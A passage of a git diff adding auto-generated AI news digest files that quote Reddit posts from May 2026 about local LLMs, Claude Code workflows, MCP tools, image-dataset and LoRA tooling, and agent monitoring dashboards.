The wild part is it works just as well with open source models. I've tested with DeepSeek-V4 and Kimi-2.6 and the accuracy holds up because the retrieval is doing the heavy lifting, not the model size. Everything runs locally, no cloud, single tenant. I open sourced it recently: [github.com/ByteBell/bytebell-oss](http://github.c… + +--- + +## [Sharing "cull" : my open-source dataset tool for image scraping & classification & captioning pipeline](https://reddit.com/r/LocalLLaMA/comments/1t9jub0/sharing_cull_my_opensource_dataset_tool_for_image/) +*Reddit r/LocalLLaMA* | 10/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> I *open-sourced* a tool I built and am maintaining called **Cull**. It’s a machine curation engine for AI image datasets, the kind of work that eats hours every time you want to train a LoRA, build a reference library, or just classify an archive that isn’t a 100,000-file mess. # What it does, end to end * Scrapes from Civitai (.com and .red), X/Twitter, Reddit, Discord, plus any URL gallery-dl supports (Pixiv, DeviantArt, the booru family, ArtStation, Tumblr, FurAffinity / e621, Imgur, Flickr, and \~340 others). * Drops every image plus its source-side prompt into a local queue. Per-source dedup, no database. * Classifies each image with a vision-language model, multiple LM Studio instances for local, Groq for cloud, anything OpenAI-compatible — using a strict 17-field JSON schema, so you don’t get free-text replies you have to regex into shape. * Sorts the keepers into category folders next to their .txt prompt and a .vision.json audit record. Two score gates (overall quality + topic relevance) you tune in the UI. * Surfaces everything through a Flask + Alpine dashboard: start/stop, source toggles, gallery, prompt editor, ZIP export, per-source stats. 
# Two example use cases I a… + +--- + +## [Sharing "cull" : my open-source dataset tool for image scraping & classification & captioning pipeline](https://reddit.com/r/StableDiffusion/comments/1t9jo0q/sharing_cull_my_opensource_dataset_tool_for_image/) +*Reddit r/StableDiffusion* | 10/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> I *open-sourced* a tool I built and am maintaining called **Cull**. It’s a machine curation engine for AI image datasets, the kind of work that eats hours every time you want to train a LoRA, build a reference library, or just classify an archive that isn’t a 100,000-file mess. # What it does, end to end * Scrapes from Civitai (.com and .red), X/Twitter, Reddit, Discord, plus any URL gallery-dl supports (Pixiv, DeviantArt, the booru family, ArtStation, Tumblr, FurAffinity / e621, Imgur, Flickr, and \~340 others). * Drops every image plus its source-side prompt into a local queue. Per-source dedup, no database. * Classifies each image with a vision-language model, multiple LM Studio instances for local, Groq for cloud, anything OpenAI-compatible — using a strict 17-field JSON schema, so you don’t get free-text replies you have to regex into shape. * Sorts the keepers into category folders next to their .txt prompt and a .vision.json audit record. Two score gates (overall quality + topic relevance) you tune in the UI. * Surfaces everything through a Flask + Alpine dashboard: start/stop, source toggles, gallery, prompt editor, ZIP export, per-source stats. # Two example use cases I a… + +--- + +## [Built an MCP that gives Claude Code the ability to watch screen recordings of UI bugs](https://reddit.com/r/ClaudeAI/comments/1t9frna/built_an_mcp_that_gives_claude_code_the_ability/) +*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> One thing Claude Code can't do natively is watch a video. 
For most bugs that's fine, but for anything visual, hover states, animations, scroll behavior, you end up spending more time describing the bug than actually fixing it. I built motif to handle this. You record the bug, point motif at the file, and it returns what's visually happening, the root cause, and a diff. It uses Gemini 2.5 Flash as it processes video as a frame sequence rather than a single screenshot. That distinction matters when the bug is a 200ms overshoot or a hover state that resets at the wrong time. Setup is a Gemini API key and two lines in your mcp.json. After that you just tell Claude Code to watch the recording. That's the whole interface. `npx motif-mcp` to try it. Repo: [https://github.com/Ashad001/motif](https://github.com/Ashad001/motif), still early so feedback is welcome. https://reddit.com/link/1t9frna/video/xd83w09fyc0h1/player + +--- + +## [Speeding up local LLM for usable coding agent](https://reddit.com/r/LocalLLaMA/comments/1t96kfh/speeding_up_local_llm_for_usable_coding_agent/) +*Reddit r/LocalLLaMA* | 10/05/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> **TL;DR: Qwen 3.6 35B-A3B** (Q4\_K\_M) **is running slow at around 9 t/s with 72% filled context (36147 tokens window) and a total response time of 77s including prefill and token generation. Ran this using LM Studio on Windows with the attached image settings, on a 5060 Ti (16GB VRAM) + 32GB system RAM. I don't consider this performance great for my planned coding agent use case, so how can I speed this up? If I can't meaningfully speed it up, what other still-useful, faster LLMs do you suggest for my hardware specs?** Hello! As I see prices becoming tighter around cloud LLMs, I decided to look into local AI coding as a backup in case of a cloud LLM "apocalypse" or whenever I need to work with critical private software (I'm aware AI coding agents shouldn't be completely trusted around such things, I know the precautions to take).
I have a 5060 Ti (16GB VRAM) + 32 GB system RAM. To test if my hardware is capable of hosting a competitive local AI, I decided to load Qwen 3.6 35B-A3B into LM Studio, which uses a llama.cpp backend. Loading it with around 32K context window, it runs at a decent speed of 17 t/s with just a simple "Hi" prompt. However, if you've used coding agents before… + +--- + +## [Parax v0.7: Parametric Modeling in JAX [P]](https://reddit.com/r/MachineLearning/comments/1t929x3/parax_v07_parametric_modeling_in_jax_p/) +*Reddit r/MachineLearning* | 10/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Hi everyone! Parax is a library for "Parametric modeling" in JAX, attempting to bridge the approach between pure JAX PyTrees, and more object-orientated modeling approaches (e.g. using [Equinox](https://github.com/patrick-kidger/equinox)). v0.7 has been released, featuring a more polished API as well as some detailed examples in the documentation. Some of Parax's features: * Derived/constrained parameters with metadata * Computed PyTrees and callable parameterizations * Abstract interfaces for fixed, bounded, and probabilistic PyTrees and parameters Two new examples in the docs that show off these features * [Bounded optimization](https://gvcallen.github.io/parax/examples/bounded_optimization_jaxopt/) (JAXopt) * [Bayesian sampling](https://gvcallen.github.io/parax/examples/bayesian_sampling_blackjax/) (BlackJAX) Perhaps the library is of use to someone, and feel free to leave any feedback! 
Cheers, Gary + +--- + +## [I built an open source hyperparameter search tool for diffusion fine-tunes- pick the winner based on scoring](https://reddit.com/r/StableDiffusion/comments/1t9k9n8/i_built_an_open_source_hyperparameter_search_tool/) +*Reddit r/StableDiffusion* | 10/05/2026 | Score: 1.00 +Tags: open_source + +> I kept running the same loop: train a LoRA, look at the samples, decide it’s “fine”, change three things at once, train again, then when a new dataset needs training, all the parameters previously need to be reviewed again. So I built something to take the hassle out of this. It’s called **Bracket**. * You point it at a dataset and a model * Set a budget (such as sample size to test # of candidates or variations to try out) * It runs X short training trials in parallel configurations (Optuna TPE for the search). * Each run gets scored two ways: * The training-loss trajectory, * A local VLM (LM Studio) judging the sample images on prompt-adherence, visual quality, and artifact-freeness. * At the end you get a Markdown report with Welch’s t-test confidence on which config wins. The whole point is to replace “this LoRA looks better to me” with “config X beats baseline by 0.34 with p=0.03 over 4 seeds”. It doesn’t reimplement training. It drives `musubi-tuner` and `sd-scripts` as subprocesses, so the trainers are exactly what kohya already supports — same args, same outputs.
Currently covers SDXL, Z-Image, Flux.1, Flux.1-Kontext, Flux-2-Klein, Qwen-Image (+ Edit), SD3.5, HunyuanVideo,… + +--- + +## [I built an open source hyperparameter search tool for diffusion fine-tunes- pick the winner based on scoring](https://reddit.com/r/LocalLLaMA/comments/1t9k8gy/i_built_an_open_source_hyperparameter_search_tool/) +*Reddit r/LocalLLaMA* | 10/05/2026 | Score: 1.00 +Tags: open_source + +> I kept running the same loop: train a LoRA, look at the samples, decide it’s “fine”, change three things at once, train again, then when a new dataset needs training, all the parameters previously need to be reviewed again. So I built something to take the hassle out of this. It’s called **Bracket**. * You point it at a dataset and a model * Set a budget (such as sample size to test # of candidates or variations to try out * It runs X short training trials in parallel configurations (Optuna TPE for the search). * Each run gets scored two ways: * The training-loss trajectory, * A local VLM (LM Studio) judging the sample images on prompt-adherence, visual quality, and artifact-freeness. * At the end you get a Markdown report with Welch’s t-test confidence on which config wins. The whole point is to replace “this LoRA looks better to me” with “config X beats baseline by 0.34 with p=0.03 over 4 seeds”. It doesn’t reimplement training. It drives `musubi-tuner` and `sd-scripts` as subprocesses, so the trainers are exactly what kohya already supports — same args, same outputs. 
Currently covers SDXL, Z-Image, Flux.1, Flux.1-Kontext, Flux-2-Klein, Qwen-Image (+ Edit), SD3.5, HunyuanVideo,… + +--- + +## [I built a site to create free AI videos using LTX 2.3 running on my own GPUs](https://reddit.com/r/StableDiffusion/comments/1t9juoy/i_built_a_site_to_create_free_ai_videos_using_ltx/) +*Reddit r/StableDiffusion* | 10/05/2026 | Score: 1.00 +Tags: open_source + +> Lately I’ve been working on my project [**loremotion.com**](http://loremotion.com) **.**The goal was simply to let anyone create AI videos without credits, subscriptions, or limits. To actually make that possible, I had to skip the APIs and build my own infrastructure. I’m mostly using open-source models like **LTX 2.3** and **Wan 2.1**. I’ve personally found LTX 2.3 (specifically the 1.1 distilled version) to give the best results for the speed I’m aiming for. Right now, I’ve capped it at 720p/10-second clips for both Text-to-Video and Image-to-Video. **The Hardware Setup:** I’m running this on my own cluster. I’ve got four of my own GPUs (30 and 40 series) and I rent the rest on-the-spot (A100s and RTX Pros). It actually keeps my costs incredibly low—around $8 a day—which is why I might be able to keep the generations free. all wired to Wan2GP **Performance:** Depending on which GPU grabs your task, a 720p 10-second render usually takes between **50 and 110 seconds**(if there's any way i can get much lower generation time, please do let me know) **Features:** * **Dashboard:** Your clips stay there for 48 hours before they’re cleared. * **Discover:** You can choose to push your b… + +--- + +## [Claude just hallucinated again and changed the whole workflow of my app. Do not run them autonomously 24/7.](https://reddit.com/r/ClaudeAI/comments/1t9h8ug/claude_just_hallucinated_again_and_changed_the/) +*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 +Tags: agent_tool + +> With Claude Max plan, you'd think you're sorted but you're not. 
It just changed a major workflow in my app and was going to make a change that would have cost me a huge bad data injection in the DB. It's far from being an autonomous AI agent. It still hallucinates a lot and this is the reason I've not onboarded on the hype train of OpenClaw and other autonomous AI agents. Every weird person on my feed who's just hyping up OpenClaw is either using it for hobby projects, exploring it, or just building hype for click baits. These technologies are far from perfect and can cost you your business if left autonomous or unchecked. Be wise. Oversee your AI agents continuously. + +--- + +## [My workflow: GPT for architecture and Claude Code for execution](https://reddit.com/r/ClaudeAI/comments/1t9etjy/my_workflow_gpt_for_architecture_and_claude_code/) +*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 +Tags: agent_tool + +> I’m working on a large project with FastAPI, Nuxt, PHP, Redis, Qdrant, and several AI agent layers. Over time, I noticed that using Claude Code directly for big architectural decisions was not always the safest approach for my project. Claude Code is extremely strong when it understands the existing codebase and needs to edit files, run tests, refactor, and follow a clear implementation plan. But when I asked it to analyze a major feature or propose a large architecture change from scratch, I sometimes saw risky suggestions or directions that did not fully fit the project. So I changed my workflow. For big decisions, I first use ChatGPT 5.5 to analyze the architecture, challenge the idea, and create a clear draft or roadmap. Then I take that draft to Claude Code and ask it to verify it against the real codebase. Claude Code usually improves the practical details: service names, controllers, helpers, file paths, implementation constraints, and possible conflicts. After that, I ask Claude Code to create an implementation guide before touching the code.
I review that guide again, then I let Claude Code execute step by step with a checklist. From my experience in this project, this fe… + +--- + +## [Anybody else noticing how good gemma-4-26b-a4b is with one-shotting three.js?](https://reddit.com/r/LocalLLaMA/comments/1t9cle9/anybody_else_noticing_how_good_gemma426ba4b_is/) +*Reddit r/LocalLLaMA* | 10/05/2026 | Score: 1.00 +Tags: cli_tool + +> I wrote up this little python app to cycle through a bunch of prompts like this: |Single HTML file using three.js from CDN. A central rotating MeshNormalMaterial torus knot. Place a bright Sprite (AdditiveBlending, soft circular canvas texture) at a position projected to screen, and 6 smaller sprites along the line from that position to screen center, each with different sizes/tints. Update positions each frame.| |:-| I have a .csv in there file with 80 or so of these little prompts to cycle through - It writes the code into a mock terminal window, detects a crash if needed, and then shows and archives the finished hmtl file. Really fun to mess around with. Link above is to a static demo - github page is here [https://github.com/RowanUnderwood/auto\_demo\_scener](https://github.com/RowanUnderwood/auto_demo_scener) No cherry picking here so there may be a few dead ones slipped into the archive :D + +--- + +## [Weekend project: behaviour trees for LLM agents](https://reddit.com/r/ClaudeAI/comments/1t9ch5y/weekend_project_behaviour_trees_for_llm_agents/) +*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 +Tags: cli_tool + +> Just throwing this out there. I kept hitting a wall with my GitLabCE pipeline based Dev Team with smaller models (Saving $$$), whenever they tackled big work like a feature implementation task, somewhere in the middle they forget half the guardrails. More instructions made it worse. 
I've got some background in game AI and behaviour trees, and BTs solve this exact problem specifically by feeding instructions during traversal of the tree structure and outcomes at each node picks the path it goes down, the leaf encodes the instruction, the agent only ever sees the next instruction. I found if I had a project on GitHub and a Project on GitLab the agent just got really confused wasting tokens trying to figure out where to commit etc. So I spent a weekend working on the idea. abtree is a CLI. You write the workflow as a YAML tree. The agent uses the CLI to walk getting instructions one step at a time and persisting the cursor (current place in tree) and regenerating a Mermaid trace on every state change. One of the big things I like is it can essentially pause and resume executions so for example you can have raise an MR mid workflow, where I then approve the change, and then my pipelin… + +--- + +## [I made Claude Code aware of its own usage limits](https://reddit.com/r/ClaudeAI/comments/1t9ayg8/i_made_claude_code_aware_of_its_own_usage_limits/) +*Reddit r/ClaudeAI* | 10/05/2026 | Score: 1.00 +Tags: api_update + +> Something that's been annoying me for a while: Claude Code has no idea how much quota it's burned. You can see the usage bars in the UI, but the model itself is completely blind to them. There's no API, no tool, no hook that exposes the current rate limit state during a conversation. Turns out Anthropic returns rate limit headers on every inference response (\`anthropic-ratelimit-unified-5h-utilization\`, \`anthropic-ratelimit-unified-7d-utilization\`, etc.) — Claude Code receives them internally to render the UI bars, but never passes them anywhere the model can see. So I built a small local HTTP proxy that sits between Claude Code and \`api.anthropic.com\`. Claude Code already respects \`ANTHROPIC\_BASE\_URL\`, so setting that to \`http://127.0.0.1:4080\` routes all traffic through the proxy. 
It intercepts the response headers and writes a one-line status file to \`\~/.claude/usage-status.md\`: \`\`\` 5h=9% 7d=99%! overage=0% bottleneck=seven\_day (10/05/2026, 16:19:04) \`\`\` Claude can then read that file on demand, or you can inject it automatically via a \`UserPromptSubmit\` hook so it's present in every prompt. Add a rule to your [CLAUDE.md](http://CLAUDE.md) and Claude wil… + +--- + diff --git a/data/digest-2026-05-11.md b/data/digest-2026-05-11.md new file mode 100644 index 0000000..0064e08 --- /dev/null +++ b/data/digest-2026-05-11.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-05-11** | 15 stories | Auto-generated from 572 archived stories + +--- + +## [Orc (working name) - auditable and declarative AI workflow](https://reddit.com/r/LocalLLaMA/comments/1ta8v5e/orc_working_name_auditable_and_declarative_ai/) +*Reddit r/LocalLLaMA* | 11/05/2026 | Score: 1.00 +Tags: api_update, mcp, developer_tool + +> **I’m building a small “Orchestration as Code” repo for LLM workflows. Does this concept make sense?** I’m building a small “Orchestration as Code” repo for LLM workflows. Does this concept make sense? I’ve been working on an early project called ORC, short for Orchestration as Code. I’m at the stage where I’m mainly trying to gauge whether the concept is interesting/useful to other people, especially people running local models, Ollama, llama.cpp, LM Studio, MCP tools, or mixed local/cloud workflows. The basic idea is: Instead of building LLM workflows as Python orchestration soup, or wiring them together in a visual tool, ORC lets you describe workflows declaratively in .orc files. Roughly: Terraform-ish workflow definitions, but for LLM agents and tool use. A workflow can define things like: \- agents \- models/providers \- tools \- schemas \- inputs \- ordered execution steps \- validation rules \- output artefacts The goal is not to build a magical autonomous agent framework. The goal is more boring. 
make LLM workflows easier to read, version, review, validate, and run repeatedly. A rough example of the kind of thing I’m aiming for: `agent researcher:` `provider: ollama` `mod… + +--- + +## [My pre-coding routine with Claude Code, 5 MCP servers before I write a single line](https://reddit.com/r/ClaudeAI/comments/1ta3a9x/my_precoding_routine_with_claude_code_5_mcp/) +*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 +Tags: api_update, mcp, developer_tool + +> Been running this routine for months now. Started because I was losing too much time to Claude just guessing. Halluzinated class names, outdated SDK methods, advice that didn't match the codebase I was actually in. So I built a routine I run before I let it write anything. Takes maybe 60-90 seconds. Saved me hundreds of hours by now. 1. Start the session and load memory. A memory MCP carries context across sessions. Last sprint, open decisions, recent learnings, why we picked X over Y three months ago. Without this, every session starts cold and Claude rebuilds my reasoning from scratch, usually wrong. 2. Index the codebase as a graph. A codebase-memory server builds a knowledge graph of the repo. Functions, callers, dependencies, cycles. When Claude needs to know what calls processOrder, it queries the graph instead of grepping blind. One tool call replaces dozens of file reads. 3. Search with Tavily for current practice. Before any non-trivial decision I let it search what people are actually doing right now. Training data is old. Best practices from a year ago aren't always still best practices. Clean answer with sources, not a wall of SEO spam. 4. 
Load Context7 for library doc… + +--- + +## [Dunetrace: Real-time monitoring of your production agents](https://reddit.com/r/StableDiffusion/comments/1t9wib2/dunetrace_realtime_monitoring_of_your_production/) +*Reddit r/StableDiffusion* | 11/05/2026 | Score: 1.00 +Tags: api_update, open_source, tool_update + +> I have been building Dunetrace, an open-source real-time monitoring tool for your production agents. **Problem:** When agents run, they return a confident answer. But sometimes in reality the answer is wrong and consumed a lot of tokens due to a tool loop or some other silent failures. All the existing tools are good once something is broken and you can debug. I wanted something that alerts before the user notices. The latest update adds: **Cross-agent pattern analysis.** Dunetrace now shows you which detectors are firing across your entire agent fleet, not just per-run alerts. TOOL\_LOOP fired on 18% of your example-agent runs this week and it's trending up? That's a code bug, not a transient failure. Agent health score 0–100 per agent\_id. **Langfuse deep analysis.** Connect your Langfuse API key and you get an 'Explain with Langfuse' button on every signal. Dunetrace fetches the trace, reads the actual system prompt, and tells you exactly what's missing. You get the root-cause from real evidence. **Custom TypeScript and Python agent integration**. A few of you were building custom agents outside LangChain. There's now a zero-dependency integration.
**GitHub repo:** [https://github.com/dun… + +--- + +## [I catalogued every way local models break JSON output and built a repair library, here's what I found across 288 model calls](https://reddit.com/r/LocalLLaMA/comments/1tagtpv/i_catalogued_every_way_local_models_break_json/) +*Reddit r/LocalLLaMA* | 11/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> I've been running structured output prompts through a bunch of models on OpenRouter for the past few months — Llama 3, Mistral, Command R, DeepSeek, Qwen, and every other model on OpenRouter — alongside the usual closed-source suspects. 288 calls total. I wanted to know what actually breaks, how often, and whether open models fail differently from the API-only ones. Short answer: not really. The failure modes are almost identical across the board. The *rate* varies — some models hit you with markdown fences on nearly every call, others only when you phrase the prompt a certain way; but the categories of breakage are the same everywhere. What I saw most, roughly in order: 1. Markdown fences wrapping the JSON (the model thinks it's being helpful) 2. Trailing commas (JS habits from training data) 3. Python `True`/`False`/`None` instead of JSON `true`/`false`/`null` 4. Truncated objects from running out of tokens mid-response 5. Unescaped quotes inside string values 6. `//` or `#` comments inside JSON 7. Literal `...` where the model got lazy and didn't generate all the data The reason I'm posting here specifically: most of the advice I see for handling this is "just use JSON mode" or… + +--- + +## [What improved my Claude Code workflow: stop treating it like chat, start treating it like a dev with a workstation](https://reddit.com/r/ClaudeAI/comments/1taelgl/what_improved_my_claude_code_workflow_stop/) +*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 +Tags: cli_tool, agent_tool + +> The most useful improvement I’ve found for Claude Code-style work has not been a magic prompt. 
It has been changing the shape of the task. When I give an agent a vague request, I get vague work. When I give it a real workstation + a real ticket, the results get much more predictable. The workflow that has been working for me: **1. Start with a ticket, not a prompt** A good ticket has: * goal * exact repo/path/context * acceptance criteria * test command * files or areas that are off-limits * expected output * whether the agent is allowed to make changes or only investigate Example: “Find why the billing page shows an empty state for active subscriptions. Do not change pricing or Stripe webhook logic. Add a regression test if possible. Run npm test. Summarize the root cause and changed files.” That tends to work much better than: “Fix the billing page.” **2. Give the agent a persistent environment** A lot of coding-agent work is not pure reasoning. It is environment work: * clone repo * install dependencies * inspect file structure * run tests * inspect logs * patch * rerun * generate output When the environment disappears after the conversation, the agent loses useful state. A per… + +--- + +## [The Claude Platform on AWS is now generally available.](https://reddit.com/r/ClaudeAI/comments/1ta7p4n/the_claude_platform_on_aws_is_now_generally/) +*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> AWS customers get the full set of Claude API features, with AWS authentication, billing, and commitment retirement. Build and deploy agents at scale with Claude Managed Agents, or use features like the advisor strategy, code execution, web search, web fetch, the Files API, MCP connector, prompt caching, citations, and batch processing. Anthropic operates the service, and all new features ship the same day they go live on the native Claude API. Claude also remains available on Amazon Bedrock, where AWS is the data processor. 
This is a good fit for teams with strict regional data residency requirements or that need data processed exclusively within AWS infrastructure. Read more: [https://claude.com/blog/claude-platform-on-aws](https://claude.com/blog/claude-platform-on-aws) + +--- + +## [Claude Code Orchestrator -> Sub-agent local LLM](https://reddit.com/r/LocalLLaMA/comments/1t9xyku/claude_code_orchestrator_subagent_local_llm/) +*Reddit r/LocalLLaMA* | 11/05/2026 | Score: 1.00 +Tags: mcp, cli_tool + +> Not written by an AI, so bear with me :P Has anyone else tried to use their local LLM in conjunction with Claude Code? I looked into [Pi.dev](http://Pi.dev) a bit, and from their documentation, I read about their RPC Mode which allows me to send command line commands to it. So I'm thinking of making an MCP that Claude Code can utilize to use [Pi.Dev](http://Pi.Dev) as a sub-agent and save a bit of usage. My line of thinking is: Claude Code orchestrator -> Local LLM -> Claude Code reviewing the code in the PR. Has anyone tried this? Am I missing something or am I a Monday-morning genius? + +--- + +## [Anyone else think the 1T Valuation is dangerous for Anthropic?](https://reddit.com/r/ClaudeAI/comments/1t9vuw5/anyone_else_think_the_1t_valuation_is_dangerous/) +*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 +Tags: api_update, tool_update + +> TLDR: The market's 1T valuation is pricing for perfection. I think there are 4 ways this perfection doesn't happen. I love Claude and Claude Code, I use it every day, and their revenue numbers (30B ARR) are amazing, and if I had a chance to invest in Anthropic a month ago, I would. But... now it is reaching a **1 Trillion** valuation on the secondary market. It took Apple 40 years to reach that, and 5 years for Anthropic. A valuation so high means it has limited growth. It's clearly driven by FOMO. If it has a down round, it would be a disaster. I see a few vulnerabilities that can cause Anthropic to go down. 1.
**Models are improving but others are catching up** Opus 4.7 wasn't a big upgrade, and "Mythos" still isn't public. Competitors are closing fast, and switching is one click away. If a new model launched tomorrow at 80% of Claude's quality and 3% the cost, I'd hesitate. But at 95% quality and 50% cost? I'd switch the same day. And so would everyone else paying enterprise rates. 2. **Limited revenue sources** Of that $30B ARR, the open guess is 60%+ comes from Claude Code and developer API. That's a single customer segment, and it's the exact segment OpenAI, Google, and every well-funded s… + +--- + +## [Markdown browser for LLMs](https://reddit.com/r/LocalLLaMA/comments/1t9tsro/markdown_browser_for_llms/) +*Reddit r/LocalLLaMA* | 11/05/2026 | Score: 1.00 +Tags: mcp, cli_tool + +> I built a markdown web renderer for AI agents. Instead of taking expensive screenshots and piping them through vision models, TextWeb renders web pages as markdown that LLMs can reason about natively. Full JavaScript execution, interactive elements annotated. It provides a CLI and an MCP server. You can find it here: [https://github.com/woheller69/textweb](https://github.com/woheller69/textweb) The LLM can do things like: navigate a web page, scroll up/down, enter text into input fields, click buttons, etc. Works with llama.cpp web UI. It is based on [https://github.com/chrisrobison/textweb](https://github.com/chrisrobison/textweb) which has a text grid renderer instead of markdown. + +--- + +## [I upgraded my Agent OS to a local 35B model and its code failure rate dropped to 0%](https://reddit.com/r/ClaudeAI/comments/1t9tqz6/i_upgraded_my_agent_os_to_a_local_35b_model_and/) +*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> I’ve been obsessed with autonomous agents lately, but it got tiring when they keep hitting walls because they didn't have the right "tools" or because their context window turned to mush after an hour. 
I’ve found that local multi-agent systems where agents are driven by an aversive state (a suffering system) to autonomously write, sandbox, and hot-load their own tools so they don't hit walls has worked quite well. When an agent encounters something it hasn’t seen before, it builds a new tool for the job, tests it in a sandbox, registers it, lets the other agents know, then keeps rolling. It’s able to build an infinite library of anything it may need in the future, completely autonomously without a human ever in the loop. Repo: [https://github.com/ninjahawk/hollow-agentOS](https://github.com/ninjahawk/hollow-agentOS) *Isn’t letting local LLMs write their own code at runtime going to get too chaotic and brick the OS fast?* With a small model (like the 9B fallback), possibly. Under high system stress, a 9B model panics. It rushes, hallucinates invalid function calls, and tries to force broken syntax past the gates. But I just scaled the default runtime engine to **Qwen 3.6 35B A3B**… + +--- + +## [Natural Woman V2 - Z Image Turbo Lora](https://reddit.com/r/StableDiffusion/comments/1t9oono/natural_woman_v2_z_image_turbo_lora/) +*Reddit r/StableDiffusion* | 11/05/2026 | Score: 1.00 +Tags: github_release, tool_update + +> Hey all, I finally got around to training a new version to my natural woman lora. The point being to fix the actor face that ZIT can tend to produce. The first version was ok but there were many cases where the image produced was lack luster or downright bad. This version accomplishes the goal while not corrupting the model. Download it here: [https://civitai.com/models/2207094?modelVersionId=2935386](https://civitai.com/models/2207094?modelVersionId=2935386) Only thing is, models tend to look back over shoulder even when prompted to face forward. I'm pruning the dataset to train a 2.1 version to fix this so look out for that. Also, while I've found that the actor face does not affect men as much as woman, I am training a natural-men lora as well. 
Look out for that soon. + +--- + +## [I have to pretend I hate image generation AI to avoid getting banned or insulted on 99% of Reddit or the internet, even though Stable Diffusion is actually what I like and am most excited about right now. Why do people hate AI so much, esp…](https://reddit.com/r/StableDiffusion/comments/1tahphc/i_have_to_pretend_i_hate_image_generation_ai_to/) +*Reddit r/StableDiffusion* | 11/05/2026 | Score: 1.00 +Tags: open_source + +> I'm not even saying I care if they know the difference between open-source and closed-source image-generating AI, or if they insult me ​​or not. What I want to know is why so many people hate AI, especially image-generating AI. At first, I thought it only bothered artists, because they're afraid their artwork will be stolen or something. Then I thought it might also bother those who are afraid of not being able to distinguish AI from reality. But it's practically 99% of people who hate AI, and I just can't understand why. + +--- + +## [Sibling to Anthropic's Claude FM — where Claude FM curates, WRIT-FM operates](https://reddit.com/r/ClaudeAI/comments/1tagr4x/sibling_to_anthropics_claude_fm_where_claude_fm/) +*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 +Tags: cli_tool + +> Anthropic shipped `/radio` this week - Claude Code now has a lofi button that opens Claude FM, a stream curated by human musicians. I'll use it. I built WRIT-FM - a 24/7 AI radio station where every layer is model output, not a hand-picked playlist: * **Music**: AI-generated. No catalog, no human picks. Tracks produced per show by ACE-Step via a local music-gen server. * **Talk**: Claude CLI writes the hosted breaks - deep dives, news analysis, panel debates, listener mailbags, music essays. Kokoro TTS speaks them in 5 distinct voices. * **Hosts**: The Liminal Operator (philosophy), Dr. Resonance (music archaeology), Nyx (night/dreams), Signal (news analysis), Ember (soul/groove). They rotate across 8 shows. 
Sundays at 18:00 a Listener Hours mailbag replaces the regular slot. * **Broadcast**: ezstream → Icecast → Cloudflare tunnel → optional YouTube RTMP relay. * **Operator**: a Claude Code agent on a 15-minute loop. Health-checks the encoder, stocks music and talk segments for upcoming slots, turns listener messages into on-air responses, grows per-station topic banks when scheduled focus areas thin out, and writes *intent cards* that steer specific upcoming segments. The piece I… + +--- + +## [prompt caching, but for rl training - 7.5x speedup on long-prompt/short-response workloads](https://reddit.com/r/LocalLLaMA/comments/1tage06/prompt_caching_but_for_rl_training_75x_speedup_on/) +*Reddit r/LocalLLaMA* | 11/05/2026 | Score: 1.00 +Tags: open_source + +> most open source RL engines pack sequences naively: prompt + response, repeated for every sample in the group. this is fine for short prompt, long completion workloads but inefficient for long prompt, short completion workloads. with 1000-token prompts and 100-token responses at G=8, you're processing 8800 tokens when only 1800 are unique. about 5x wasted compute. the fix is conceptually simple: compute the prompt once, then compute all G responses after it. it's analagous to inference prefix caching, except training needs gradients to flow back through the prompt, which breaks causal attention in the obvious implementation. getting it right required different tricks for full vs. linear attention layers. you can read about it in the blogpost in the comments. 
Numbers on Qwen3.5-4B: \- 16k prompt / 64 out → 7.5x \- 16k / 128 → 7.3x \- 16k / 1k → 5.4x \- 8k / 4k → 1.7x + +--- + +## [GitLab announces workforce reduction and end of their CREDIT values](https://about.gitlab.com/blog/gitlab-act-2/) +*Hacker News* | 11/05/2026 | Score: 1.00 +Tags: product_launch + +--- + diff --git a/data/digest-2026-05-12.md b/data/digest-2026-05-12.md new file mode 100644 index 0000000..92ddd5e --- /dev/null +++ b/data/digest-2026-05-12.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-12** | 15 stories | Auto-generated from 612 archived stories + +--- + +## [TUI to actually see what Claude Code is doing: cost, loops, tool commands…](https://reddit.com/r/ClaudeAI/comments/1tb669z/tui_to_actually_see_what_claude_code_is_doing/) +*Reddit r/ClaudeAI* | 12/05/2026 | Score: 1.00 +Tags: mcp, open_source, cli_tool + +> I was running blind watching Claude Code work, could not tell where my money was going, when it was stuck in a loop, or what it was doing with my filesystem. So i built something open source to make it visible. works with Claude Code, Codex CLI, Gemini CLI, Cursor, and any MCP server. 
A scan of my own machine for the last 90 days showed what i do been missing: \- $14K spend across 39 sessions \- 129 agent loops, \~20% wasted iterations (mostly Edit-in-circles on the same 5 files) \- 3 credential leaks in tool input (JWTs, GitHub tokens, GCP keys) \- 5 sensitive paths an AI could reach at any moment (\~/.ssh, \~/.npmrc, gcloud creds) \- 2 dangerous commands node9 would have blocked Now i can: \- See where my money is going in real time \- Catch the most dangerous commands before they finish running \- Stop or continue a run while it's happening \- Analyze the data after the fact, any time range The live dashboard: \- High level: cost, tokens, command counts, all live \- Notifications: loops + critical commands surface here so i can make a call before things go sideways \- Live feed: the commands Claude is running right now \- Live security: dangerous actions the AI is taking \- Liv… + +--- + +## [I built a Mac app that turns Claude Code agents into live radio stations | Free & open source](https://reddit.com/r/ClaudeAI/comments/1tasoqo/i_built_a_mac_app_that_turns_claude_code_agents/) +*Reddit r/ClaudeAI* | 12/05/2026 | Score: 1.00 +Tags: open_source, cli_tool, agent_tool + +> **TL;DR:** Agent FM is an open-source Mac app that lets you tune in to your Claude Code and Codex agents while they work, so you can stay in the loop and hear their progress live. Each agent gets its own live radio station. You can tune in to one agent, or listen to a Global Mix across all active agents. It surfaces progress, blockers, decisions, errors, 